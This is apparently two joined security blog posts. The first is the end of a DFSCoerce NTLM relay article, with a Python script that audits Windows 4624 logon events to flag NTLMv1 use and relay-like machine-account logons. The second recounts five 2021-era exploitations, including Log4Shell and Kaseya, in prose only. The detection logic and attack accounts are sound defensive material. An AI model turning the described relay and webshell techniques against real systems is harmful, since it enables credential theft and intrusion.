While Microsoft has issued patches for NTLM attacks in the past, it is unclear whether it will do the same for DFSNM to thwart the DFSCoerce method.

The advice for system administrators is to follow Microsoft’s advisory on how to prevent NTLM relay attacks. The Microsoft advisory, triggered by PetitPotam, will also prevent DFSCoerce and other NTLM attack methods. The recommendation basically says to disable the deprecated NTLM authentication where possible and use the Extended Protection for Authentication (EPA). Extended Protection for Authentication helps protect against MITM attacks, in which an attacker intercepts a client’s credentials and forwards them to a server.
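Before NTLM can be disabled "where possible", an administrator needs to know where it is still in use. The following is an added example, not code from the article or from Microsoft: it inventories NTLM network logons from Windows Security event 4624 records. The records below are constructed sample data, and the 4624 field names used (LogonType, AuthenticationPackageName, LmPackageName, WorkstationName, IpAddress) follow the event's standard schema. The two risk heuristics (NTLMv1 is legacy and weak; a machine account authenticating with NTLM from a host other than its own is the pattern coercion-and-relay attacks such as PetitPotam and DFSCoerce produce) are assumptions of this example, chosen for triage rather than as a definitive detection rule.

```python
"""Inventory NTLM network logons from Windows Security event 4624 records.

Added example with constructed sample events; not code from the article.
"""
from collections import Counter
from typing import Dict, List, Optional, Tuple

# Constructed sample 4624 records (not real log data). LogonType 3 is a network
# logon; AuthenticationPackageName is Kerberos or NTLM; LmPackageName carries the
# NTLM version ("NTLM V1" / "NTLM V2") and is "-" for Kerberos logons.
SAMPLE_EVENTS: List[Dict[str, object]] = [
    {"EventID": 4624, "LogonType": 3, "TargetUserName": "alice", "TargetDomainName": "CORP",
     "WorkstationName": "WS01", "IpAddress": "10.0.0.21",
     "AuthenticationPackageName": "Kerberos", "LmPackageName": "-"},
    {"EventID": 4624, "LogonType": 3, "TargetUserName": "bob", "TargetDomainName": "CORP",
     "WorkstationName": "WS02", "IpAddress": "10.0.0.22",
     "AuthenticationPackageName": "NTLM", "LmPackageName": "NTLM V2"},
    {"EventID": 4624, "LogonType": 3, "TargetUserName": "svc_backup", "TargetDomainName": "CORP",
     "WorkstationName": "LEGACY01", "IpAddress": "10.0.0.50",
     "AuthenticationPackageName": "NTLM", "LmPackageName": "NTLM V1"},
    {"EventID": 4624, "LogonType": 3, "TargetUserName": "DC01$", "TargetDomainName": "CORP",
     "WorkstationName": "DC01", "IpAddress": "10.0.0.10",
     "AuthenticationPackageName": "NTLM", "LmPackageName": "NTLM V2"},
    {"EventID": 4624, "LogonType": 3, "TargetUserName": "DC01$", "TargetDomainName": "CORP",
     "WorkstationName": "UNKNOWN", "IpAddress": "10.0.0.99",
     "AuthenticationPackageName": "NTLM", "LmPackageName": "NTLM V2"},
    # Interactive (LogonType 2) logon: not a network logon, so not relay-relevant.
    {"EventID": 4624, "LogonType": 2, "TargetUserName": "carol", "TargetDomainName": "CORP",
     "WorkstationName": "WS03", "IpAddress": "127.0.0.1",
     "AuthenticationPackageName": "NTLM", "LmPackageName": "NTLM V2"},
]


def classify(event: Dict[str, object]) -> Optional[Dict[str, str]]:
    """Return a finding for an NTLM network logon, or None if the event is not of interest."""
    if event.get("EventID") != 4624 or event.get("LogonType") != 3:
        return None
    if event.get("AuthenticationPackageName") != "NTLM":
        return None  # Kerberos (or other) network logons are what we want to see

    user = str(event["TargetUserName"])
    workstation = str(event.get("WorkstationName", ""))
    lm_package = str(event.get("LmPackageName", "-"))

    # Heuristic 1 (assumption of this example): NTLMv1 is the weakest variant.
    if "V1" in lm_package.upper():
        level, reason = "high", "NTLMv1 in use"
    else:
        level, reason = "medium", "NTLM in use where Kerberos would be expected"

    # Heuristic 2 (assumption of this example): a computer account ("NAME$")
    # authenticating with NTLM from a host that is not NAME is the shape a
    # coerced-authentication relay produces, so it outranks the version check.
    if user.endswith("$") and workstation.upper() != user[:-1].upper():
        level, reason = "high", "machine account NTLM logon from a foreign host"

    return {
        "account": f"{event['TargetDomainName']}\\{user}",
        "source": f"{workstation}/{event.get('IpAddress', '-')}",
        "lm_package": lm_package,
        "level": level,
        "reason": reason,
    }


def audit_ntlm_logons(events: List[Dict[str, object]]) -> Tuple[List[Dict[str, str]], Dict[str, int]]:
    """Classify every event and return (findings, count of findings per risk level)."""
    findings = [f for f in (classify(e) for e in events) if f is not None]
    summary = Counter(f["level"] for f in findings)
    return findings, dict(summary)


if __name__ == "__main__":
    results, totals = audit_ntlm_logons(SAMPLE_EVENTS)
    for finding in results:
        print(f"[{finding['level']:6}] {finding['account']:18} from {finding['source']:18} "
              f"{finding['lm_package']:8} {finding['reason']}")
    print("summary:", totals)
```

On the constructed sample the Kerberos logon and the interactive logon are skipped, the NTLMv2 user logon and the domain controller's own logon come out as medium, and the NTLMv1 service account and the DC01$ logon from an unexpected host come out as high. Run against real 4624 exports (for example from a SIEM query), the medium entries form the list of hosts and accounts still depending on NTLM that must be addressed before it can be disabled, while the high entries deserve immediate attention.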

Stay safe, everyone!

The post DFSCoerce, a new NTLM relay attack, can take control over a Windows domain appeared first on Malwarebytes Labs.

Security vulnerabilities: 5 times that organizations got hacked

Businesses and governments these days are relying on dozens of different Software-as-a-Service (SaaS) applications to run their operations — and it’s no secret that hackers are always looking for security vulnerabilities in them to exploit.

According to research by BetterCloud, the average company with 500 to 999 employees uses about 93 different SaaS applications, with that number rising to 177 for companies with over 1000 employees.

Coupled with the fact that vendors release thousands of updates each year to patch security vulnerabilities in their software, it’s not surprising that businesses and governments are struggling to keep up with the volume of security vulnerabilities and patches.

And lo and behold, despite the best efforts of governments and businesses around the globe, hackers still managed to exploit multiple security vulnerabilities in 2021.

In this post, we’ll take a look at five times governments and businesses got hacked thanks to security vulnerabilities in 2021.

1. APT41 exploits Log4Shell vulnerability to compromise at least two US state governments

First publicly announced in early December 2021, Log4Shell (CVE-2021-44228) is a critical security vulnerability in the popular Java logging library Apache Log4j 2. The vulnerability is simple to exploit and enables attackers to perform remote code execution.

A patch for Log4Shell was released on 9 December 2021, but within hours of the initial December 10 2021 announcement, hacker groups were already racing to exploit Log4Shell before businesses and governments could patch it — and at least one of them was successful.

Shortly after the advisory, the Chinese state-sponsored hacking group APT41 exploited Log4Shell to compromise at least two US state governments, according to research from Mandiant. Once they gained access to internet-facing systems, APT41 began a months-long campaign of reconnaissance and credential harvesting.

2. North Korean government-backed groups exploit Chrome zero-day vulnerability

On February 10 2022, Google's Threat Analysis Group (TAG) discovered that two North Korean government-backed groups had exploited a vulnerability (CVE-2022-0609) in Chrome to attack over 250 individuals working for various media, fintech, and software companies.

The activities of the two groups have been tracked as Operation Dream Job and AppleJeus, and both of them used the same exploit kit to collect sensitive information from affected systems.

How does it work, you ask? Well, hackers exploited a use-after-free (UAF) vulnerability in the Animation component of Chrome — which, just like Log4Shell, allows hackers to perform remote code execution.

3. Hackers infiltrate governments and companies with ManageEngine ADSelfService Plus vulnerability

From September 17 through early October, hackers successfully compromised at least nine companies and 370 servers by exploiting a vulnerability (CVE-2021-40539) in ManageEngine ADSelfService Plus, a self-service password management and single sign-on solution.

So, what happens after hackers exploit this vulnerability? You guessed it — remote code execution. Specifically, hackers uploaded a payload to a victim's network that installed a webshell, a malicious script that grants hackers a persistent gateway to the affected device.

From there, hackers moved laterally to other systems on the network, exfiltrated any files they pleased, and even stole credentials.

4. Tallinn-based hacker exploits Estonian government platform security vulnerabilities

In July 2021, Estonian officials announced that a Tallinn-based male had gained access to KMAIS, Estonia’s ID-document database, where he downloaded the government ID photos of 286,438 Estonians.

To do this, the hacker exploited a vulnerability in KMAIS that allowed him to obtain a person’s ID photo using queries. Specifically, KMAIS did not sufficiently check the validity of the query received — and so, using fake digital certificates, the suspect could download the photograph of whoever he was pretending to be.

5. Russian hackers exploit Kaseya security vulnerabilities

Kaseya, a Miami-based software company, provides tech services to thousands of businesses over the world — and on July 2 2021, Kaseya CEO Fred Voccola had an urgent message for Kaseya customers: shut down your servers immediately.

The urgency was warranted. Over 1,500 small and midsize businesses had just been attacked, with attackers asking for $70 million in payment.

A Russia-based cybergang known as REvil claimed responsibility for the attack. According to Huntress Labs, REvil exploited a zero-day (CVE-2021-30116) and performed an authentication bypass in Kaseya's web interface — allowing them to deploy a ransomware attack on MSPs and their customers.

Organizations need a streamlined approach to vulnerability assessment

Hackers took advantage of many security vulnerabilities in 2021 to breach an array of governments and businesses.

As we broke down in this article, hackers can range from individuals to whole state-sponsored groups — and we also saw how vulnerabilities themselves can appear in just about any piece of software regardless of the industry.

And while some vulnerabilities are certainly worse than others, the sheer volume of vulnerabilities out there makes it difficult to keep up with the volume of security patches. With the right vulnerability management and patch management, however, your organization can find (and correct) weak points that malicious hackers, viruses, and other cyberthreats want to attack.

Want to learn more about different vulnerability and patch management tools? Visit our Vulnerability and Patch Management page or read the solution brief.

The post Security vulnerabilities: 5 times that organizations got hacked appeared first on Malwarebytes Labs.